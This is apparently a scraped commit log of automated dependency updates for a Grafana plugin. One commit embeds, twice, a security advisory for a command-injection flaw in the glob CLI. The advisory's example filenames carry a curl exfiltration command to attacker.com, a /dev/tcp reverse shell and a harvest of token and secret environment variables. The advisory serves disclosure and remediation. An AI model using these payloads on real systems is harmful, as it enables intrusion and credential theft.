This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`^20.8.7` -> `^20.19.16`](https://renovatebot.com/diffs/npm/@types%2fnode/20.19.16/20.19.25) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJ1cGRhdGUtcGF0Y2giXX0=--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f858259eaf |
chore(deps): update dependency @babel/core to ^7.28.4 (#2126)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`^7.21.4` -> `^7.28.4`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.4/7.28.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.5`](https://redirect.github.com/babel/babel/blob/HEAD/CHANGELOG.md#v7285-2025-10-23) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.4...v7.28.5) ##### 👓 Spec Compliance - `babel-parser` - [#​17446](https://redirect.github.com/babel/babel/pull/17446) Allow `Runtime Errors for Function Call Assignment Targets` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-validator-identifier` - [#​17501](https://redirect.github.com/babel/babel/pull/17501) fix: update identifier to unicode 17 ([@​fisker](https://redirect.github.com/fisker)) ##### 🐛 Bug Fix - `babel-plugin-proposal-destructuring-private` - [#​17534](https://redirect.github.com/babel/babel/pull/17534) Allow mixing private destructuring and rest ([@​CO0Ki3](https://redirect.github.com/CO0Ki3)) - `babel-parser` - [#​17521](https://redirect.github.com/babel/babel/pull/17521) Improve `@babel/parser` error typing ([@​JLHwung](https://redirect.github.com/JLHwung)) - [#​17491](https://redirect.github.com/babel/babel/pull/17491) fix: improve ts-only declaration parsing ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-proposal-discard-binding`, `babel-plugin-transform-destructuring` - [#​17519](https://redirect.github.com/babel/babel/pull/17519) fix: `rest` correctly returns plain array ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-create-class-features-plugin`, `babel-helper-member-expression-to-functions`, `babel-plugin-transform-block-scoping`, `babel-plugin-transform-optional-chaining`, `babel-traverse`, `babel-types` - [#​17503](https://redirect.github.com/babel/babel/pull/17503) Fix `JSXIdentifier` handling in `isReferencedIdentifier` ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-traverse` - [#​17504](https://redirect.github.com/babel/babel/pull/17504) fix: ensure scope.push register in anonymous fn ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-types` - [#​17494](https://redirect.github.com/babel/babel/pull/17494) Type checking babel-types scripts ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### :running\_woman: Performance - `babel-core` - [#​17490](https://redirect.github.com/babel/babel/pull/17490) Faster finding of locations in `buildCodeFrameError` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4xMi4xIiwidXBkYXRlZEluVmVyIjoiNDIuMTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
46a0157d70 |
fix(deps): pin dependencies (#2104)
This PR contains the following updates: | Package | Type | Update | Change | Age | Confidence | |---|---|---|---|---|---| | [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react)) | devDependencies | pin | [`^18.2.25` -> `18.3.24`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.24/18.3.24) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react-dom](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react-dom)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react-dom/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Release Notes <details> <summary>facebook/react (react)</summary> ### [`v18.3.1`](https://redirect.github.com/facebook/react/blob/HEAD/CHANGELOG.md#1831-April-26-2024) [Compare Source](https://redirect.github.com/facebook/react/compare/v18.3.0...v18.3.1) - Export `act` from `react` [f1338f]( |
||
|
renovate-sh-app[bot]
|
5790b9a68d |
chore(deps): update dependency glob to v11 [security] (#2122)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[
|
||
github-actions[bot]
|
b13d567eee |
chore: bump @grafana/create-plugin configuration to 5.26.4 (#2082)
Bumps [`@grafana/create-plugin`](https://github.com/grafana/plugin-tools/tree/main/packages/create-plugin) configuration from 4.2.1 to 5.26.4. **Notes for reviewer:** This is an auto-generated PR which ran `@grafana/create-plugin update`. Please consult the create-plugin [CHANGELOG.md](https://github.com/grafana/plugin-tools/blob/main/packages/create-plugin/CHANGELOG.md) to understand what may have changed. Please review the changes thoroughly before merging. --------- Co-authored-by: grafana-plugins-platform-bot[bot] <144369747+grafana-plugins-platform-bot[bot]@users.noreply.github.com> Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
dependabot[bot]
|
5dec534e2a |
Bump form-data from 4.0.0 to 4.0.4 (#2059)
Bumps [form-data](https://github.com/form-data/form-data) from 4.0.0 to 4.0.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/releases">form-data's releases</a>.</em></p> <blockquote> <h2>v4.0.1</h2> <h3>Fixes</h3> <ul> <li>npmignore temporary build files (<a href="https://redirect.github.com/form-data/form-data/issues/532">#532</a>)</li> <li>move util.isArray to Array.isArray (<a href="https://redirect.github.com/form-data/form-data/issues/564">#564</a>)</li> </ul> <h3>Tests</h3> <ul> <li>migrate from travis to GHA</li> </ul> </blockquote> </details> <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/blob/master/CHANGELOG.md">form-data's changelog</a>.</em></p> <blockquote> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a> - 2025-07-16</h2> <h3>Commits</h3> <ul> <li>[meta] add <code>auto-changelog</code> <a href=" |
||
Zoltán Bedi
|
0594cc8ab0 | Update prismjs dependency to version 1.30.0 (#1999) | ||
|
dependabot[bot]
|
2af583ae9e |
Bump @babel/runtime from 7.22.15 to 7.26.10 (#1989)
Bumps [@babel/runtime](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime) from 7.22.15 to 7.26.10. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/babel/babel/releases"><code>@babel/runtime</code>'s releases</a>.</em></p> <blockquote> <h2>v7.26.10 (2025-03-11)</h2> <p>Thanks <a href="https://github.com/jordan-choi"><code>@jordan-choi</code></a> and <a href="https://github.com/mmmsssttt404"><code>@mmmsssttt404</code></a> for your first PRs!</p> <p>This release includes a fix for <a href="https://github.com/babel/babel/security/advisories/GHSA-968p-4wvh-cqc8">https://github.com/babel/babel/security/advisories/GHSA-968p-4wvh-cqc8</a>, a security vulnerability which affects the <code>.replace</code> method of transpiled regular expressions that use named capturing groups.</p> <h4>👓 Spec Compliance</h4> <ul> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17159">#17159</a> Disallow decorator in array pattern (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> </ul> <h4>🐛 Bug Fix</h4> <ul> <li><code>babel-parser</code>, <code>babel-template</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17164">#17164</a> Fix: always initialize ExportDeclaration attributes (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-core</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17142">#17142</a> fix: "Map maximum size exceeded" in deepClone (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-parser</code>, <code>babel-plugin-transform-typescript</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17154">#17154</a> Update typescript parser tests (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-traverse</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17151">#17151</a> fix: Should not evaluate vars in child scope (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-generator</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17153">#17153</a> fix: Correctly generate <code>abstract override</code> (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17107">#17107</a> Fix source type detection when parsing TypeScript (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-helpers</code>, <code>babel-runtime</code>, <code>babel-runtime-corejs2</code>, <code>babel-runtime-corejs3</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17173">#17173</a> Fix processing of replacement pattern with named capture groups (<a href="https://github.com/%5Bmmmsssttt404%5D(https://github.com/mmmsssttt404)"><code>@mmmsssttt404</code></a>)</li> </ul> </li> </ul> <h4>💅 Polish</h4> <ul> <li><code>babel-standalone</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17158">#17158</a> Avoid warnings when re-bundling <code>@babel/standalone</code> with webpack (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> </ul> <h4>🏠 Internal</h4> <ul> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17160">#17160</a> Left-value parsing cleanup (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> </ul> <h4>Committers: 6</h4> <ul> <li>Babel Bot (<a href="https://github.com/babel-bot"><code>@babel-bot</code></a>)</li> <li>Huáng Jùnliàng (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> <li>Nicolò Ribaudo (<a href="https://github.com/nicolo-ribaudo"><code>@nicolo-ribaudo</code></a>)</li> <li>Yunyoung Jordan Choi (<a href="https://github.com/jordan-choi"><code>@jordan-choi</code></a>)</li> <li><a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a></li> <li><a href="https://github.com/mmmsssttt404"><code>@mmmsssttt404</code></a></li> </ul> <h2>v7.26.9 (2025-02-14)</h2> <h4>🐛 Bug Fix</h4> <ul> <li><code>babel-types</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17103">#17103</a> fix: Definition for <code>TSPropertySignature.kind</code> (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-generator</code>, <code>babel-types</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17062">#17062</a> Print TypeScript optional/definite in ClassPrivateProperty (<a href="https://github.com/jamiebuilds-signal"><code>@jamiebuilds-signal</code></a>)</li> </ul> </li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/babel/babel/blob/main/CHANGELOG.md"><code>@babel/runtime</code>'s changelog</a>.</em></p> <blockquote> <h2>v7.26.10 (2025-03-11)</h2> <h4>👓 Spec Compliance</h4> <ul> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17159">#17159</a> Disallow decorator in array pattern (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> </ul> <h4>🐛 Bug Fix</h4> <ul> <li><code>babel-parser</code>, <code>babel-template</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17164">#17164</a> Fix: always initialize ExportDeclaration attributes (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-core</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17142">#17142</a> fix: "Map maximum size exceeded" in deepClone (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-parser</code>, <code>babel-plugin-transform-typescript</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17154">#17154</a> Update typescript parser tests (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-traverse</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17151">#17151</a> fix: Should not evaluate vars in child scope (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-generator</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17153">#17153</a> fix: Correctly generate <code>abstract override</code> (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17107">#17107</a> Fix source type detection when parsing TypeScript (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> <li><code>babel-helpers</code>, <code>babel-runtime</code>, <code>babel-runtime-corejs2</code>, <code>babel-runtime-corejs3</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17173">#17173</a> Fix processing of replacement pattern with named capture groups (<a href="https://github.com/%5Bmmmsssttt404%5D(https://github.com/mmmsssttt404)"><code>@mmmsssttt404</code></a>)</li> </ul> </li> </ul> <h4>💅 Polish</h4> <ul> <li><code>babel-standalone</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17158">#17158</a> Avoid warnings when re-bundling <code>@babel/standalone</code> with webpack (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> </ul> <h4>🏠 Internal</h4> <ul> <li><code>babel-parser</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17160">#17160</a> Left-value parsing cleanup (<a href="https://github.com/JLHwung"><code>@JLHwung</code></a>)</li> </ul> </li> </ul> <h2>v7.26.9 (2025-02-14)</h2> <h4>🐛 Bug Fix</h4> <ul> <li><code>babel-types</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17103">#17103</a> fix: Definition for <code>TSPropertySignature.kind</code> (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> <li><code>babel-generator</code>, <code>babel-types</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17062">#17062</a> Print TypeScript optional/definite in ClassPrivateProperty (<a href="https://github.com/jamiebuilds-signal"><code>@jamiebuilds-signal</code></a>)</li> </ul> </li> </ul> <h4>🏠 Internal</h4> <ul> <li><code>babel-types</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17130">#17130</a> Use <code>.ts</code> files with explicit reexports to solve name conflicts (<a href="https://github.com/nicolo-ribaudo"><code>@nicolo-ribaudo</code></a>)</li> </ul> </li> <li><code>babel-core</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17127">#17127</a> Do not depend on <code>@types/gensync</code> in Babel 7 (<a href="https://github.com/nicolo-ribaudo"><code>@nicolo-ribaudo</code></a>)</li> </ul> </li> </ul> <h2>v7.26.7 (2025-01-24)</h2> <h4>🐛 Bug Fix</h4> <ul> <li><code>babel-helpers</code>, <code>babel-preset-env</code>, <code>babel-runtime-corejs3</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17086">#17086</a> Make "object without properties" helpers ES6-compatible (<a href="https://github.com/tquetano-netflix"><code>@tquetano-netflix</code></a>)</li> </ul> </li> <li><code>babel-plugin-transform-typeof-symbol</code> <ul> <li><a href="https://redirect.github.com/babel/babel/pull/17085">#17085</a> fix: Correctly handle <code>typeof</code> in arrow functions (<a href="https://github.com/liuxingbaoyu"><code>@liuxingbaoyu</code></a>)</li> </ul> </li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
dependabot[bot]
|
a5cfbfa7d9 |
Bump serialize-javascript from 6.0.1 to 6.0.2 (#1974)
Bumps [serialize-javascript](https://github.com/yahoo/serialize-javascript) from 6.0.1 to 6.0.2. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/yahoo/serialize-javascript/releases">serialize-javascript's releases</a>.</em></p> <blockquote> <h2>v6.0.2</h2> <ul> <li>fix: serialize URL string contents to prevent XSS (<a href="https://redirect.github.com/yahoo/serialize-javascript/issues/173">#173</a>) f27d65d</li> <li>Bump <code>@babel/traverse</code> from 7.10.1 to 7.23.7 (<a href="https://redirect.github.com/yahoo/serialize-javascript/issues/171">#171</a>) 02499c0</li> <li>docs: update readme with URL support (<a href="https://redirect.github.com/yahoo/serialize-javascript/issues/146">#146</a>) 0d88527</li> <li>chore: update node version and lock file e2a3a91</li> <li>fix typo (<a href="https://redirect.github.com/yahoo/serialize-javascript/issues/164">#164</a>) 5a1fa64</li> </ul> <p><a href="https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2">https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2</a></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
dependabot[bot]
|
88c51806fd |
Bump dompurify from 3.1.6 to 3.2.4 (#1969)
